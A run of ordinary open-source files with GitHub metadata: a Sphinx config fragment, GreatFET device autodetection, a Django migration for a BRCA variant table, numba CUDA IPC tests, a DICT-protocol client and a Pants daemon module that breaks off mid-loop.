# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'BatchOpenMPI.tex', u'BatchOpenMPI Documentation',
u'Antoine Dymond', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
{
"content_hash": "4b7e1f4bac362fcda328d009e375b0e2",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 80,
"avg_line_length": 32.94475138121547,
"alnum_prop": 0.7105483816870702,
"repo_name": "hamish2014/batchOpenMPI",
"id": "2b3fe3d307f41ca88fe08f398abea232412d3677",
"size": "6386",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "39973"
},
{
"name": "Shell",
"bytes": "3218"
}
],
"symlink_target": ""
}
|
from .board import GreatFETBoard
# Ensure that we have access to all GreatFET boards. Normally, we'd avoid
# importing an entire namespace, but in this case, this allows us to ensure
# that all board modules are loaded for autoidentification.
from .boards import *
active_connections = {}
def GreatFET(**board_identifiers):
"""
Attempts to create a new instance of GreatFET board (sub)class
most applicable to the given device. For example, if the attached
board is a GreatFET One, this will automatically create a
GreatFETOne object.
Accepts the same arguments as pyusb's usb.find() method, allowing narrowing
to a more specific GreatFET by e.g. serial number. Like usb.find(), providing
find_all will return a list of all found devices.
Throws a DeviceNotFoundError if no device is avaiable and find_all is not set.
"""
if 'find_all' in board_identifiers and board_identifiers['find_all']:
del board_identifiers['find_all']
return GreatFETBoard.autodetect_all(**board_identifiers)
else:
return GreatFETBoard.autodetect(**board_identifiers)
def GreatFETSingleton(serial=None):
""" Returns a GreatFET object, re-using an existing object if we already have a connection to the given GreatFET. """
# If we already have a GreatFET with the given serial,
if serial in active_connections:
device = active_connections[serial]
if device.comms.still_connected():
return device
# Otherwise, try to create a new GreatFET instance.
greatfet = GreatFET(serial_number=serial)
active_connections[serial] = greatfet
return greatfet
|
{
"content_hash": "73bdb9726f3e87d461115f896b6eb7ae",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 121,
"avg_line_length": 36.659574468085104,
"alnum_prop": 0.693557748113755,
"repo_name": "greatscottgadgets/greatfet",
"id": "5b90fcb4712de7ec4877f5a2f257dd0ae8461b46",
"size": "1760",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "host/greatfet/greatfet.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "823"
},
{
"name": "C",
"bytes": "546689"
},
{
"name": "C++",
"bytes": "457321"
},
{
"name": "CMake",
"bytes": "20175"
},
{
"name": "Dockerfile",
"bytes": "601"
},
{
"name": "Makefile",
"bytes": "8176"
},
{
"name": "Python",
"bytes": "541237"
},
{
"name": "Shell",
"bytes": "2236"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.RunSQL("""DROP TABLE IF EXISTS variant CASCADE;
DROP FUNCTION IF EXISTS variant_fts_trigger();
"""),
migrations.CreateModel(
name='Variant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
# These are some extra derived columns that help with filtering
('Variant_in_ENIGMA', models.BooleanField(default=False)),
('Variant_in_ClinVar', models.BooleanField(default=False)),
('Variant_in_1000_Genomes', models.BooleanField(default=False)),
('Variant_in_ExAC', models.BooleanField(default=False)),
('Variant_in_LOVD', models.BooleanField(default=False)),
('Variant_in_BIC', models.BooleanField(default=False)),
('Variant_in_ESP', models.BooleanField(default=False)),
('Variant_in_exLOVD', models.BooleanField(default=False)),
('Source', models.TextField()),
('URL_ENIGMA', models.TextField()),
('Condition_ID_type_ENIGMA', models.TextField()),
('Condition_ID_value_ENIGMA', models.TextField()),
('Condition_category_ENIGMA', models.TextField()),
('Clinical_significance_ENIGMA', models.TextField()),
('Date_last_evaluated_ENIGMA', models.TextField()),
('Assertion_method_ENIGMA', models.TextField()),
('Assertion_method_citation_ENIGMA', models.TextField()),
('Clinical_significance_citations_ENIGMA', models.TextField()),
('Comment_on_clinical_significance_ENIGMA', models.TextField()),
('Collection_method_ENIGMA', models.TextField()),
('Allele_origin_ENIGMA', models.TextField()),
('ClinVarAccession_ENIGMA', models.TextField()),
('Clinical_Significance_ClinVar', models.TextField()),
('Date_Last_Updated_ClinVar', models.TextField()),
('Submitter_ClinVar', models.TextField()),
('SCV_ClinVar', models.TextField()),
('Allele_Origin_ClinVar', models.TextField()),
('Method_ClinVar', models.TextField()),
('Functional_analysis_result_LOVD', models.TextField()),
('Origin_of_variant_LOVD', models.TextField()),
('Functional_analysis_technique_LOVD', models.TextField()),
('Variant_frequency_LOVD', models.TextField()),
('Variant_haplotype_LOVD', models.TextField()),
('Minor_allele_frequency_ESP', models.TextField()),
('EUR_Allele_frequency_1000_Genomes', models.TextField()),
('AFR_Allele_frequency_1000_Genomes', models.TextField()),
('AMR_Allele_frequency_1000_Genomes', models.TextField()),
('EAS_Allele_frequency_1000_Genomes', models.TextField()),
('Allele_frequency_1000_Genomes', models.TextField()),
('SAS_Allele_frequency_1000_Genomes', models.TextField()),
('Allele_frequency_ExAC', models.TextField()),
('Patient_nationality_BIC', models.TextField()),
('Clinical_importance_BIC', models.TextField()),
('Clinical_classification_BIC', models.TextField()),
('Literature_citation_BIC', models.TextField()),
('Number_of_family_member_carrying_mutation_BIC', models.TextField()),
('Germline_or_Somatic_BIC', models.TextField()),
('Ethnicity_BIC', models.TextField()),
('Mutation_type_BIC', models.TextField()),
('IARC_class_exLOVD', models.TextField()),
('Sum_family_LR_exLOVD', models.TextField()),
('Combined_prior_probablility_exLOVD', models.TextField()),
('Literature_source_exLOVD', models.TextField()),
('Co_occurrence_LR_exLOVD', models.TextField()),
('Posterior_probability_exLOVD', models.TextField()),
('Missense_analysis_prior_probability_exLOVD', models.TextField()),
('Segregation_LR_exLOVD', models.TextField()),
('SIFT_VEP', models.TextField()),
('PolyPhen_VEP', models.TextField()),
('Gene_Symbol', models.TextField()),
('Reference_Sequence', models.TextField()),
('HGVS_cDNA', models.TextField()),
('BIC_Identifier', models.TextField()),
('HGVS_Protein', models.TextField()),
('Protein_Change', models.TextField()),
('Allele_Frequency', models.TextField()),
('Max_Allele_Frequency', models.TextField()),
('Genomic_Coordinate_hg38', models.TextField()),
('Genomic_Coordinate_hg37', models.TextField()),
('Genomic_Coordinate_hg36', models.TextField()),
('Source_URL', models.TextField()),
('Discordant', models.TextField()),
('Synonyms', models.TextField()),
('Pathogenicity_default', models.TextField()),
('Pathogenicity_research', models.TextField()),
],
options={
'db_table': 'variant',
},
),
]
|
{
"content_hash": "7eddcd3370ccd614e407f36bd5fdef0e",
"timestamp": "",
"source": "github",
"line_count": 103,
"max_line_length": 114,
"avg_line_length": 54.679611650485434,
"alnum_prop": 0.5550426136363636,
"repo_name": "BD2KGenomics/brca-website",
"id": "8c069fe5e48e0e3d54caf85fbe58a750ff95dd54",
"size": "5704",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/data/migrations/0001_initial.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "9933"
},
{
"name": "HTML",
"bytes": "724"
},
{
"name": "JavaScript",
"bytes": "132104"
},
{
"name": "Python",
"bytes": "69138"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, print_function, division
import sys
import multiprocessing as mp
import traceback
import pickle
import numpy as np
from numba import cuda
from numba.cuda.cudadrv import drvapi, devicearray
from numba import unittest_support as unittest
from numba.cuda.testing import skip_on_cudasim, CUDATestCase
not_linux = not sys.platform.startswith('linux')
has_mp_get_context = hasattr(mp, 'get_context')
def core_ipc_handle_test(the_work, result_queue):
try:
arr = the_work()
except:
# FAILED. propagate the exception as a string
succ = False
out = traceback.format_exc()
else:
# OK. send the ndarray back
succ = True
out = arr
result_queue.put((succ, out))
def base_ipc_handle_test(handle, size, result_queue):
def the_work():
dtype = np.dtype(np.intp)
with cuda.open_ipc_array(handle, shape=size // dtype.itemsize,
dtype=dtype) as darr:
# copy the data to host
return darr.copy_to_host()
core_ipc_handle_test(the_work, result_queue)
def serialize_ipc_handle_test(handle, result_queue):
def the_work():
dtype = np.dtype(np.intp)
darr = handle.open_array(cuda.current_context(),
shape=handle.size // dtype.itemsize,
dtype=dtype)
# copy the data to host
arr = darr.copy_to_host()
handle.close()
return arr
core_ipc_handle_test(the_work, result_queue)
def ipc_array_test(ipcarr, result_queue):
try:
with ipcarr as darr:
arr = darr.copy_to_host()
try:
# should fail to reopen
with ipcarr:
pass
except ValueError as e:
if str(e) != 'IpcHandle is already opened':
raise AssertionError('invalid exception message')
else:
raise AssertionError('did not raise on reopen')
except:
# FAILED. propagate the exception as a string
succ = False
out = traceback.format_exc()
else:
# OK. send the ndarray back
succ = True
out = arr
result_queue.put((succ, out))
@unittest.skipIf(not_linux, "IPC only supported on Linux")
@unittest.skipUnless(has_mp_get_context, "requires multiprocessing.get_context")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcMemory(CUDATestCase):
def test_ipc_handle(self):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
# create IPC handle
ctx = cuda.current_context()
ipch = ctx.get_ipc_handle(devarr.gpu_data)
# manually prepare for serialization as bytes
handle_bytes = bytes(ipch.handle)
size = ipch.size
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (handle_bytes, size, result_queue)
proc = ctx.Process(target=base_ipc_handle_test, args=args)
proc.start()
succ, out = result_queue.get()
if not succ:
self.fail(out)
else:
np.testing.assert_equal(arr, out)
proc.join(3)
def check_ipc_handle_serialization(self, index_arg=None):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
if index_arg is not None:
devarr = devarr[index_arg]
expect = devarr.copy_to_host()
# create IPC handle
ctx = cuda.current_context()
ipch = ctx.get_ipc_handle(devarr.gpu_data)
# pickle
buf = pickle.dumps(ipch)
ipch_recon = pickle.loads(buf)
self.assertIs(ipch_recon.base, None)
self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle))
self.assertEqual(ipch_recon.size, ipch.size)
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (ipch, result_queue)
proc = ctx.Process(target=serialize_ipc_handle_test, args=args)
proc.start()
succ, out = result_queue.get()
if not succ:
self.fail(out)
else:
np.testing.assert_equal(expect, out)
proc.join(3)
def test_ipc_handle_serialization(self):
# test no slicing
self.check_ipc_handle_serialization()
# slicing tests
self.check_ipc_handle_serialization(slice(3, None))
self.check_ipc_handle_serialization(slice(3, 8))
self.check_ipc_handle_serialization(slice(None, 8))
def check_ipc_array(self, index_arg=None):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
# Slice
if index_arg is not None:
devarr = devarr[index_arg]
expect = devarr.copy_to_host()
ipch = devarr.get_ipc_handle()
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (ipch, result_queue)
proc = ctx.Process(target=ipc_array_test, args=args)
proc.start()
succ, out = result_queue.get()
if not succ:
self.fail(out)
else:
np.testing.assert_equal(expect, out)
proc.join(3)
def test_ipc_array(self):
# test no slicing
self.check_ipc_array()
# slicing tests
self.check_ipc_array(slice(3, None))
self.check_ipc_array(slice(3, 8))
self.check_ipc_array(slice(None, 8))
@unittest.skipUnless(not_linux, "Only on OS other than Linux")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcNotSupported(CUDATestCase):
def test_unsupported(self):
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
with self.assertRaises(OSError) as raises:
devarr.get_ipc_handle()
errmsg = str(raises.exception)
self.assertIn('OS does not support CUDA IPC', errmsg)
def staged_ipc_handle_test(handle, device_num, result_queue):
def the_work():
with cuda.gpus[device_num]:
this_ctx = cuda.devices.get_context()
can_access = handle.can_access_peer(this_ctx)
print('can_access_peer {} {}'.format(this_ctx, can_access))
deviceptr = handle.open_staged(this_ctx)
arrsize = handle.size // np.dtype(np.intp).itemsize
hostarray = np.zeros(arrsize, dtype=np.intp)
cuda.driver.device_to_host(
hostarray, deviceptr, size=handle.size,
)
handle.close()
return hostarray
core_ipc_handle_test(the_work, result_queue)
def staged_ipc_array_test(ipcarr, device_num, result_queue):
try:
with cuda.gpus[device_num]:
this_ctx = cuda.devices.get_context()
print(this_ctx.device)
with ipcarr as darr:
arr = darr.copy_to_host()
try:
# should fail to reopen
with ipcarr:
pass
except ValueError as e:
if str(e) != 'IpcHandle is already opened':
raise AssertionError('invalid exception message')
else:
raise AssertionError('did not raise on reopen')
except:
# FAILED. propagate the exception as a string
succ = False
out = traceback.format_exc()
else:
# OK. send the ndarray back
succ = True
out = arr
result_queue.put((succ, out))
@unittest.skipIf(not_linux, "IPC only supported on Linux")
@unittest.skipUnless(has_mp_get_context, "requires multiprocessing.get_context")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcStaged(CUDATestCase):
def test_staged(self):
# prepare data for IPC
arr = np.arange(10, dtype=np.intp)
devarr = cuda.to_device(arr)
# spawn new process for testing
mpctx = mp.get_context('spawn')
result_queue = mpctx.Queue()
# create IPC handle
ctx = cuda.current_context()
ipch = ctx.get_ipc_handle(devarr.gpu_data)
# pickle
buf = pickle.dumps(ipch)
ipch_recon = pickle.loads(buf)
self.assertIs(ipch_recon.base, None)
self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle))
self.assertEqual(ipch_recon.size, ipch.size)
# Test on every CUDA devices
for device_num in range(len(cuda.gpus)):
args = (ipch, device_num, result_queue)
proc = mpctx.Process(target=staged_ipc_handle_test, args=args)
proc.start()
succ, out = result_queue.get()
proc.join(3)
if not succ:
self.fail(out)
else:
np.testing.assert_equal(arr, out)
def test_ipc_array(self):
for device_num in range(len(cuda.gpus)):
# prepare data for IPC
arr = np.random.random(10)
devarr = cuda.to_device(arr)
ipch = devarr.get_ipc_handle()
# spawn new process for testing
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
args = (ipch, device_num, result_queue)
proc = ctx.Process(target=staged_ipc_array_test, args=args)
proc.start()
succ, out = result_queue.get()
proc.join(3)
if not succ:
self.fail(out)
else:
np.testing.assert_equal(arr, out)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "ae1990792ade49fb1ee55c07432c266d",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 80,
"avg_line_length": 32.69899665551839,
"alnum_prop": 0.577477753912243,
"repo_name": "jriehl/numba",
"id": "cebf2a3af66222c1a655521f9f30a78e7d0c113e",
"size": "9777",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "numba/cuda/tests/cudapy/test_ipc.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7023"
},
{
"name": "C",
"bytes": "657637"
},
{
"name": "C++",
"bytes": "49158"
},
{
"name": "Cuda",
"bytes": "214"
},
{
"name": "GDB",
"bytes": "101"
},
{
"name": "HTML",
"bytes": "3464"
},
{
"name": "Jupyter Notebook",
"bytes": "110326"
},
{
"name": "Python",
"bytes": "6611899"
},
{
"name": "Shell",
"bytes": "7290"
}
],
"symlink_target": ""
}
|
import socket, re
version = '1.0'
def dequote(str):
"""Will remove single or double quotes from the start and end of a string
and return the result."""
quotechars = "'\""
while len(str) and str[0] in quotechars:
str = str[1:]
while len(str) and str[-1] in quotechars:
str = str[0:-1]
return str
def enquote(str):
"""This function will put a string in double quotes, properly
escaping any existing double quotes with a backslash. It will
return the result."""
return '"' + str.replace('"', "\\\"") + '"'
class Connection:
"""This class is used to establish a connection to a database server.
You will usually use this as the first call into the dictclient library.
Instantiating it takes two optional arguments: a hostname (a string)
and a port (an int). The hostname defaults to localhost
and the port to 2628, the port specified in RFC."""
def __init__(self, hostname = 'localhost', port = 2628):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((hostname, port))
self.rfile = self.sock.makefile("rt")
self.wfile = self.sock.makefile("wt", 0)
self.saveconnectioninfo()
def getresultcode(self):
"""Generic function to get a result code. It will return a list
consisting of two items: the integer result code and the text
following. You will not usually use this function directly."""
line = self.rfile.readline().strip()
code, text = line.split(' ', 1)
return [int(code), text]
def get200result(self):
"""Used when expecting a single line of text -- a 200-class
result. Returns [intcode, remaindertext]"""
code, text = self.getresultcode()
if code < 200 or code >= 300:
raise Exception, "Got '%s' when 200-class response expected" % \
line
return [code, text]
def get100block(self):
"""Used when expecting multiple lines of text -- gets the block
part only. Does not get any codes or anything! Returns a string."""
data = []
while 1:
line = self.rfile.readline().strip()
if line == '.':
break
data.append(line)
return "\n".join(data)
def get100result(self):
"""Used when expecting multiple lines of text, terminated by a period
and a 200 code. Returns: [initialcode, [bodytext_1lineperentry],
finalcode]"""
code, text = self.getresultcode()
if code < 100 or code >= 200:
raise Exception, "Got '%s' when 100-class response expected" % \
code
bodylines = self.get100block().split("\n")
code2 = self.get200result()[0]
return [code, bodylines, code2]
def get100dict(self):
"""Used when expecting a dictionary of results. Will read from
the initial 100 code, to a period and the 200 code."""
dict = {}
for line in self.get100result()[1]:
key, val = line.split(' ', 1)
dict[key] = dequote(val)
return dict
def saveconnectioninfo(self):
"""Called by __init__ to handle the initial connection. Will
save off the capabilities and messageid."""
code, string = self.get200result()
assert code == 220
capstr, msgid = re.search('<(.*)> (<.*>)$', string).groups()
self.capabilities = capstr.split('.')
self.messageid = msgid
def getcapabilities(self):
"""Returns a list of the capabilities advertised by the server."""
return self.capabilities
def getmessageid(self):
"""Returns the message id, including angle brackets."""
return self.messageid
def getdbdescs(self):
"""Gets a dict of available databases. The key is the db name
and the value is the db description. This command may generate
network traffic!"""
if hasattr(self, 'dbdescs'):
return self.dbdescs
self.sendcommand("SHOW DB")
self.dbdescs = self.get100dict()
return self.dbdescs
def getstratdescs(self):
"""Gets a dict of available strategies. The key is the strat
name and the value is the strat description. This call may
generate network traffic!"""
if hasattr(self, 'stratdescs'):
return self.stratdescs
self.sendcommand("SHOW STRAT")
self.stratdescs = self.get100dict()
return self.stratdescs
def getdbobj(self, dbname):
"""Gets a Database object corresponding to the database name passed
in. This function explicitly will *not* generate network traffic.
If you have not yet run getdbdescs(), it will fail."""
if not hasattr(self, 'dbobjs'):
self.dbobjs = {}
if self.dbobjs.has_key(dbname):
return self.dbobjs[dbname]
# We use self.dbdescs explicitly since we don't want to
# generate net traffic with this request!
if dbname != '*' and dbname != '!' and \
not dbname in self.dbdescs.keys():
raise Exception, "Invalid database name '%s'" % dbname
self.dbobjs[dbname] = Database(self, dbname)
return self.dbobjs[dbname]
def sendcommand(self, command):
"""Takes a command, without a newline character, and sends it to
the server."""
self.wfile.write(command + "\n")
def define(self, database, word):
"""Returns a list of Definition objects for each matching
definition. Parameters are the database name and the word
to look up. This is one of the main functions you will use
to interact with the server. Returns a list of Definition
objects. If there are no matches, an empty list is returned.
Note: database may be '*' which means to search all databases,
or '!' which means to return matches from the first database that
has a match."""
self.getdbdescs() # Prime the cache
if database != '*' and database != '!' and \
not database in self.getdbdescs():
raise Exception, "Invalid database '%s' specified" % database
self.sendcommand("DEFINE " + enquote(database) + " " + enquote(word))
code = self.getresultcode()[0]
retval = []
if code == 552:
# No definitions.
return []
if code != 150:
raise Exception, "Unknown code %d" % code
while 1:
code, text = self.getresultcode()
if code != 151:
break
resultword, resultdb = re.search('^"(.+)" (\S+)', text).groups()
defstr = self.get100block()
retval.append(Definition(self, self.getdbobj(resultdb),
resultword, defstr))
return retval
def match(self, database, strategy, word):
"""Gets matches for a query. Arguments are database name,
the strategy (see available ones in getstratdescs()), and the
pattern/word to look for. Returns a list of Definition objects.
If there is no match, an empty list is returned.
Note: database may be '*' which means to search all databases,
or '!' which means to return matches from the first database that
has a match."""
self.getstratdescs() # Prime the cache
self.getdbdescs() # Prime the cache
if not strategy in self.getstratdescs().keys():
raise Exception, "Invalid strategy '%s'" % strategy
if database != '*' and database != '!' and \
not database in self.getdbdescs().keys():
raise Exception, "Invalid database name '%s'" % database
self.sendcommand("MATCH %s %s %s" % (enquote(database),
enquote(strategy),
enquote(word)))
code = self.getresultcode()[0]
if code == 552:
# No Matches
return []
if code != 152:
raise Exception, "Unexpected code %d" % code
retval = []
for matchline in self.get100block().split("\n"):
matchdict, matchword = matchline.split(" ", 1)
retval.append(Definition(self, self.getdbobj(matchdict),
dequote(matchword)))
if self.getresultcode()[0] != 250:
raise Exception, "Unexpected end-of-list code %d" % code
return retval
class Database:
"""An object corresponding to a particular database in a server."""
def __init__(self, dictconn, dbname):
"""Initialize the object -- requires a Connection object and
a database name."""
self.conn = dictconn
self.name = dbname
def getname(self):
"""Returns the short name for this database."""
return self.name
def getdescription(self):
if hasattr(self, 'description'):
return self.description
if self.getname() == '*':
self.description = 'All Databases'
elif self.getname() == '!':
self.description = 'First matching database'
else:
self.description = self.conn.getdbdescs()[self.getname()]
return self.description
def getinfo(self):
"""Returns a string of info describing this database."""
if hasattr(self, 'info'):
return self.info
if self.getname() == '*':
self.info = "This special database will search all databases on the system."
elif self.getname() == '!':
self.info = "This special database will return matches from the first matching database."
else:
self.conn.sendcommand("SHOW INFO " + self.name)
self.info = "\n".join(self.conn.get100result()[1])
return self.info
def define(self, word):
"""Get a definition from within this database.
The argument, word, is the word to look up. The return value is the
same as from Connection.define()."""
return self.conn.define(self.getname(), word)
def match(self, strategy, word):
"""Get a match from within this database.
The argument, word, is the word to look up. The return value is
the same as from Connection.define()."""
return self.conn.match(self.getname(), strategy, word)
class Definition:
"""An object corresponding to a single definition."""
def __init__(self, dictconn, db, word, defstr = None):
"""Instantiate the object. Requires: a Connection object,
a Database object (NOT corresponding to '*' or '!' databases),
a word. Optional: a definition string. If not supplied,
it will be fetched if/when it is requested."""
self.conn = dictconn
self.db = db
self.word = word
self.defstr = defstr
def getdb(self):
"""Get the Database object corresponding to this definition."""
return self.db
def getdefstr(self):
"""Get the definition string (the actual content) of this
definition."""
if not self.defstr:
self.defstr = self.conn.define(self.getdb().getname(), self.word)[0].getdefstr()
return self.defstr
def getword(self):
"""Get the word this object describes."""
return self.word
|
{
"content_hash": "4e892058775a935f55792d0fadf34b7f",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 101,
"avg_line_length": 38.62207357859532,
"alnum_prop": 0.5886733633529615,
"repo_name": "mazaclub/mazabot-core",
"id": "8701dbf9ad107c419970effe3309674b76147f65",
"size": "12367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/Dict/local/dictclient.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "2344559"
},
{
"name": "Shell",
"bytes": "454"
}
],
"symlink_target": ""
}
|
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import threading
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonExiter, DaemonPantsRunner
from pants.bin.engine_initializer import EngineInitializer
from pants.engine.native import Native
from pants.init.target_roots import TargetRoots
from pants.logging.setup import setup_logging
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.collections import combined_dict
from pants.util.memo import memoized_property
class _LoggerStream(object):
"""A sys.{stdout,stderr} replacement that pipes output to a logger."""
def __init__(self, logger, log_level, logger_stream):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param file logger_stream: The underlying file object the logger is writing to, for
determining the fileno to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._stream = logger_stream
def write(self, msg):
for line in msg.rstrip().splitlines():
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._stream.fileno()
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception):
"""Represents a failure to start pantsd."""
class RuntimeFailure(Exception):
"""Represents a pantsd failure at runtime, usually from an underlying service failure."""
class Factory(object):
@classmethod
def create(cls, bootstrap_options=None):
"""
:param Options bootstrap_options: The bootstrap options, if available.
"""
bootstrap_options = bootstrap_options or cls._parse_bootstrap_options()
bootstrap_options_values = bootstrap_options.for_global_scope()
build_root = get_buildroot()
native = Native.create(bootstrap_options_values)
# TODO: https://github.com/pantsbuild/pants/issues/3479
watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
legacy_graph_helper = cls._setup_legacy_graph_helper(native, bootstrap_options_values)
services, port_map = cls._setup_services(
build_root,
bootstrap_options_values,
legacy_graph_helper,
watchman
)
return PantsDaemon(
native,
build_root,
bootstrap_options_values.pants_workdir,
bootstrap_options_values.level.upper(),
legacy_graph_helper.scheduler.lock,
services,
port_map,
bootstrap_options_values.pants_subprocessdir,
bootstrap_options
)
@staticmethod
def _parse_bootstrap_options():
return OptionsBootstrapper().get_bootstrap_options()
@staticmethod
def _setup_legacy_graph_helper(native, bootstrap_options):
"""Initializes a `LegacyGraphHelper` instance."""
return EngineInitializer.setup_legacy_graph(
bootstrap_options.pants_ignore,
bootstrap_options.pants_workdir,
native=native,
build_ignore_patterns=bootstrap_options.build_ignore,
exclude_target_regexps=bootstrap_options.exclude_target_regexp,
subproject_roots=bootstrap_options.subproject_roots,
)
@staticmethod
def _setup_services(build_root, bootstrap_options, legacy_graph_helper, watchman):
"""Initialize pantsd services.
:returns: A tuple of (`tuple` service_instances, `dict` port_map).
"""
fs_event_service = FSEventService(watchman, build_root, bootstrap_options.pantsd_fs_event_workers)
scheduler_service = SchedulerService(fs_event_service, legacy_graph_helper)
pailgun_service = PailgunService(
bind_addr=(bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
exiter_class=DaemonExiter,
runner_class=DaemonPantsRunner,
target_roots_class=TargetRoots,
scheduler_service=scheduler_service
)
return (
# Services.
(fs_event_service, scheduler_service, pailgun_service),
# Port map.
dict(pailgun=pailgun_service.pailgun_port)
)
def __init__(self, native, build_root, work_dir, log_level, lock, services, socket_map,
metadata_base_dir, bootstrap_options=None):
"""
:param Native native: A `Native` instance.
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param string metadata_base_dir: The ProcessManager metadata base dir.
:param Options bootstrap_options: The bootstrap options, if available.
"""
super(PantsDaemon, self).__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._native = native
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._lock = lock
self._services = services
self._socket_map = socket_map
self._bootstrap_options = bootstrap_options
self._log_dir = os.path.join(work_dir, self.name)
self._logger = logging.getLogger(__name__)
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
self._exiter = Exiter()
@memoized_property
def watchman_launcher(self):
return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
@property
def is_killed(self):
return self._kill_switch.is_set()
@property
def options_fingerprint(self):
return OptionsFingerprinter.combined_options_fingerprint_for_scope(
GLOBAL_SCOPE,
self._bootstrap_options,
fingerprint_key='daemon',
invert=True
)
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
with self._lock:
for service, service_thread in service_thread_map.items():
self._logger.info('terminating pantsd service: {}'.format(service))
service.terminate()
service_thread.join()
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_fds():
"""Close stdio streams to avoid output in the tty that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
def _setup_logging(self, log_level):
"""Initializes logging."""
# Reinitialize logging for the daemon context.
result = setup_logging(log_level, log_dir=self._log_dir, log_name=self.LOG_NAME)
# Close out tty file descriptors.
self._close_fds()
# Redirect stdio to the root logger.
sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_stream)
sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_stream)
self._logger.debug('logging initialized')
return result.log_stream
def _setup_services(self, services):
assert self._lock is not None, 'PantsDaemon lock has not been set!'
for service in services:
self._logger.info('setting up service {}'.format(service))
service.setup(self._lock)
def _run_services(self, services):
"""Service runner main loop."""
if not services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: threading.Thread(target=service.run) for service in services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info('starting service {}'.format(service))
try:
service_thread.start()
except (RuntimeError, service.ServiceError):
self.shutdown(service_thread_map)
raise self.StartupFailure('service {} failed to start, shutting down!'.format(service))
# Once all services are started, write our pid.
self.write_pid()
self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, self.options_fingerprint)
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
